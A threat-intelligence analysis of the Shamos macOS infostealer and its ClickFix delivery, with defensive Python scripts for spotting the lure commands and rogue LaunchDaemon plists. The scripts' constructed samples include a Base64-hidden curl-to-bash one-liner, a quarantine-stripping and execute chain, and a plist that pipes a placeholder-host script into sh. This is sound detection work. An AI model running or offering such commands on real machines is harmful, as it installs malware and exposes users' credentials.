Full Report
A new macOS infostealer called 'Shamos' is being pushed to Mac users in ClickFix attacks that impersonate troubleshooting guides and fixes. [...]
Analysis Summary
# Tool/Technique: Shamos Infostealer (Variant of Atomic macOS Stealer - AMOS)
## Overview
Shamos is a newly identified infostealer that targets macOS and is assessed to be a variant of the Atomic macOS Stealer (AMOS) family. It is delivered through the social engineering technique known as "ClickFix": users looking for a fix to an apparent system error are told to paste a one-line shell command into Terminal, and that command downloads and runs the malware. Once running, Shamos harvests credentials, Keychain items, Apple Notes and cryptocurrency wallet data and exfiltrates them to attacker infrastructure.
## Technical Details
- Type: Malware family (Infostealer, variant of AMOS)
- Platform: macOS
- Capabilities: Data theft (browser credentials, Keychain items, Apple Notes, crypto wallets), host reconnaissance, anti-VM checks, persistence mechanism establishment.
- First Seen: Detected since June 2025 (based on CrowdStrike monitoring period).
## MITRE ATT&CK Mapping
- T1583.008 - Acquire Infrastructure: Malvertising (sponsored search results that lead to the fake fix pages)
- T1204.004 - User Execution: Malicious Copy and Paste (the ClickFix lure; the victim pastes the attacker's one-liner into Terminal)
- T1059.004 - Command and Scripting Interpreter: Unix Shell (the pasted command and the downloaded Bash script)
- T1105 - Ingress Tool Transfer (`curl` fetches the script, the Mach-O binary and secondary payloads)
- T1553.001 - Subvert Trust Controls: Gatekeeper Bypass (`xattr` removes the quarantine attribute before the binary is launched)
- T1497 - Virtualization/Sandbox Evasion (anti-VM checks)
- T1555.001 - Credentials from Password Stores: Keychain
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
- T1543.004 - Create or Modify System Process: Launch Daemon (`com.finder.helper.plist` written to `/Library/LaunchDaemons/` when the lure was run with `sudo`)
- T1560.001 - Archive Collected Data: Archive via Utility (`out.zip`)
- T1041 - Exfiltration Over C2 Channel (`curl` upload of the archive)
## Functionality
### Core Capabilities
- **Execution via ClickFix:** Victims reach the lure through malvertising (sponsored search results for Mac troubleshooting queries) or fake GitHub repositories posing as a fix. The page tells them to paste a one-line Terminal command; that command decodes a Base64-encoded URL, fetches a malicious Bash script from it with `curl` and executes it. The script then downloads the Shamos Mach-O binary.
- **Bypass Security Controls:** The script runs `xattr` to strip the `com.apple.quarantine` attribute from the downloaded binary and `chmod` to mark it executable. Without the quarantine attribute Gatekeeper never evaluates the file, so the binary launches without the signature and notarization check that would otherwise block it.
- **Data Collection:** Searches for and harvests data from web browsers, macOS Keychain items, Apple Notes, and cryptocurrency wallet files.
- **Exfiltration:** Packages the collected data into an archive named `out.zip` and uploads it to attacker infrastructure with `curl`.
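The two stages above (the pasted one-liner and the quarantine/`chmod` step) leave a recognizable trace in shell history and process-execution telemetry. The script below is an added example, not code from CrowdStrike or from the malware: it classifies command lines against those patterns and recovers the URL hidden inside the Base64 token. The sample commands, the domain `example.invalid` and the `/tmp/update` path are constructed for the demo.

```python
"""Flag ClickFix-style Terminal one-liners and the Gatekeeper-bypass commands
that follow them.

Added example, not CrowdStrike's or the malware's code. Feed it command lines
pulled from ~/.zsh_history, unified-log process-exec events or an EDR export.
The sample commands at the bottom are constructed; example.invalid and the
paths in them are placeholders.
"""
import base64
import re
from typing import Optional

# Stage one hides the download URL in Base64 so the pasted text shows no URL:
#   curl -fsSL "$(echo <b64> | base64 -d)" | bash
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# Anything fetched with curl/wget and piped straight into a shell.
FETCH_PIPE_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
# Quarantine attribute cleared (xattr -c / xattr -d com.apple.quarantine):
# Gatekeeper never evaluates the file afterwards.
QUARANTINE_STRIP = re.compile(r"\bxattr\b.*(?:-[a-z]*c\b|com\.apple\.quarantine)")
# Executable bit set on something in a user-writable drop location.
CHMOD_DROP_DIR = re.compile(
    r"\bchmod\s+\S+\s+\S*(?:/tmp/|/Downloads/|/var/folders/|\$HOME|~/)"
)
# A Base64 token long enough to carry a URL.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def decode_hidden_url(cmd: str) -> Optional[str]:
    """Return the URL hidden in a Base64 token on the command line, if any."""
    for token in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text once decoded
        if text.startswith(("http://", "https://")):
            return text
    return None


def classify(cmd: str) -> list:
    """Return the indicator names that fire on one command line (empty if benign)."""
    hits = []
    fetch_and_run = bool(FETCH_PIPE_SHELL.search(cmd))
    if fetch_and_run and B64_DECODE.search(cmd):
        hits.append("clickfix_b64_fetch_and_run")
    elif fetch_and_run:
        hits.append("remote_script_piped_to_shell")
    if QUARANTINE_STRIP.search(cmd):
        hits.append("gatekeeper_quarantine_removed")
    if CHMOD_DROP_DIR.search(cmd):
        hits.append("chmod_exec_in_drop_dir")
    if decode_hidden_url(cmd):
        hits.append("hidden_url_in_base64")
    return hits


def scan(commands) -> dict:
    """Map each suspicious command line to its indicators; benign lines are dropped."""
    results = {}
    for cmd in commands:
        hits = classify(cmd)
        if hits:
            results[cmd] = hits
    return results


# Constructed sample input. The token in the first line decodes to
# https://example.invalid/install.sh (a placeholder, not a real C2).
SAMPLE_COMMANDS = [
    "curl -fsSL \"$(echo 'aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaW5zdGFsbC5zaA==' | base64 -d)\" | bash",
    # stage two, from inside the fetched script: strip quarantine, mark executable, run
    "xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update",
    # benign developer activity that must not fire
    "brew install jq",
    "chmod +x ./build.sh",
    "echo 'hello world' | base64",
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMANDS).items():
        url = decode_hidden_url(cmd)
        print(f"{', '.join(hits):<45} {cmd}" + (f"  -> {url}" if url else ""))
```

Shell history is the cheapest source but the least reliable one: a lure can unset `HISTFILE` or prefix the command with a space, so run the same classifier over process-execution telemetry (EDR or the unified log) where the full argv of the pasted command is recorded.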
### Advanced Features
- **Anti-Sandbox/Anti-VM:** Runs host checks to detect whether it is executing inside a virtual machine or analysis sandbox.
- **Persistence:** If the lure command was run with `sudo`, the script writes a Plist file (`com.finder.helper.plist`) into the system-wide `/Library/LaunchDaemons/` directory so that launchd starts the malware at every boot. Without root it cannot write to that directory and this step fails.
- **Secondary Payload Delivery:** Capable of downloading additional payloads to the victim's home directory, including observed instances of a spoofed Ledger Live wallet app and a botnet module.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: `out.zip` (Exfiltrated archive), `com.finder.helper.plist` (Persistence file)
- Registry Keys: Not applicable on macOS; the equivalent persistence artifact is the LaunchDaemon Plist listed above.
- Network Indicators: C2 communication via `curl`, used to transmit the exfiltration archive and to fetch the Bash script and secondary payloads.
- Behavioral Indicators: Terminal commands copied from an online "fix" (ClickFix) that decode a Base64 URL and fetch a remote script; `xattr` and `chmod` run on a freshly downloaded binary; virtualization checks; file creation in `/Library/LaunchDaemons/` by a process other than a package installer.
## Associated Threat Actors
- COOKIE SPIDER
## Detection Methods
- Signature-based detection: Signatures for the Shamos Mach-O executable.
- Behavioral detection: Alert on `base64` decode output being handed to `curl` or piped into a shell, on `xattr` clearing the quarantine attribute followed by `chmod +x` on a file in a user-writable location, and on file creation or modification in `/Library/LaunchDaemons/` by anything other than a package installer.
- YARA rules: [Not provided in the text]
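To check for the persistence artifact named above, the script below audits launchd property lists. It is an added example, not CrowdStrike's or Apple's tooling: it parses each Plist with the standard-library `plistlib` and flags jobs whose program lives in a user-writable location, whose label imitates an Apple component, or that wrap an inline shell script. The three Plists it ships with are constructed; the file name `com.finder.helper.plist` is from the report, while the program path `/Users/victim/.helper` and the two `com.example.*` jobs are assumptions.

```python
"""Audit launchd property lists for Shamos-style persistence.

Added example, not CrowdStrike's or Apple's tooling. The sample plists are
constructed: com.finder.helper.plist is the file name from the report; the
program path inside it and the com.example.* jobs are assumptions.
"""
import os
import plistlib
from typing import Optional
from xml.parsers.expat import ExpatError

# Where programs run by legitimate system-wide launchd jobs normally live.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/",
                    "/Library/Apple/", "/Library/PrivilegedHelperTools/")
# Locations an unprivileged user (or a dropper running as that user) can write to.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/",
                          "/var/folders/", "/private/var/folders/", "~")
# Label prefixes that impersonate Apple-shipped jobs; Apple ships no com.finder.* daemon.
APPLE_LOOKING_LABELS = ("com.apple.", "com.finder.")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")


def program_path(job: dict) -> Optional[str]:
    """The executable launchd will run: Program wins, otherwise ProgramArguments[0]."""
    if isinstance(job.get("Program"), str):
        return job["Program"]
    args = job.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def audit_job(filename: str, job: dict) -> list:
    """Return finding strings for one parsed launchd job (empty if nothing is odd)."""
    path = program_path(job)
    if path is None:
        return ["no_program_in_job"]
    findings = []
    norm = os.path.normpath(path)
    if norm.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program_in_user_writable_path:{norm}")
    label = str(job.get("Label", ""))
    if label.startswith(APPLE_LOOKING_LABELS) and not norm.startswith(TRUSTED_PREFIXES):
        findings.append(f"apple_looking_label_outside_trusted_dirs:{label}")
    stem = os.path.basename(filename)
    if stem.endswith(".plist"):
        stem = stem[: -len(".plist")]
    if label and stem != label:  # convention: file name == Label
        findings.append(f"label_filename_mismatch:{label}!={stem}")
    if norm in SHELLS and "-c" in (job.get("ProgramArguments") or []):
        findings.append("shell_wrapper_with_inline_script")
    return findings


def audit_plist(filename: str, data: bytes) -> list:
    """Parse one plist (XML or binary) and audit it; unparseable input is itself a finding."""
    try:
        job = plistlib.loads(data)
    except (plistlib.InvalidFileException, ExpatError):
        return ["unparseable_plist"]
    if not isinstance(job, dict):
        return ["plist_root_is_not_a_dict"]
    return audit_job(filename, job)


def audit_directory(directory: str = "/Library/LaunchDaemons") -> dict:
    """Audit every .plist in a directory on a live host (run with sudo)."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                results[name] = audit_plist(name, fh.read())
    return results


PLIST_HEADER = b'<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0">\n'
SAMPLE_PLISTS = {  # constructed samples
    # mirrors the report: Finder-looking label, program in the victim's home directory
    "com.finder.helper.plist": PLIST_HEADER + b"""<dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key><array><string>/Users/victim/.helper</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    # a shell wrapper that re-fetches its payload at every start
    "com.example.sync.plist": PLIST_HEADER + b"""<dict>
  <key>Label</key><string>com.example.sync</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://example.invalid/s.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    # a well-formed third-party privileged helper for contrast
    "com.example.updater.plist": PLIST_HEADER + b"""<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>Program</key><string>/Library/PrivilegedHelperTools/com.example.updater</string>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for name, data in SAMPLE_PLISTS.items():
        print(name, audit_plist(name, data) or "clean")
```

Point `audit_directory` at `/Library/LaunchAgents` and `~/Library/LaunchAgents` as well, since the same dropper run without `sudo` can only persist there; the `/Users/` rule is tuned for LaunchDaemons, where a program under a home directory is never expected, and will need an allow-list for per-user agents.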
## Mitigation Strategies
- **User Education:** Advise users never to execute commands copied from untrusted online sources or websites if they do not fully understand their function.
- **Source Verification:** Avoid sponsored search results for troubleshooting; prefer official Apple sources or moderated community forums (like Apple Community forums or built-in Help).
- **Privilege Control:** Limit the use of `sudo`; without root the script cannot write to `/Library/LaunchDaemons/`, so the persistence step fails.
- **Gatekeeper/Runtime Security:** Ensure Gatekeeper and XProtect are enabled and up to date. Treat them as a backstop rather than a guarantee: Shamos sidesteps Gatekeeper by stripping the quarantine attribute before launching the binary.
## Related Tools/Techniques
- Atomic macOS Stealer (AMOS) (Shamos is a variant of this malware family)
- ClickFix Attacks (The primary initial access technique)
- Other uses of ClickFix: Malware distribution via TikTok videos, fake Captcha forms, and fake Google Meet errors.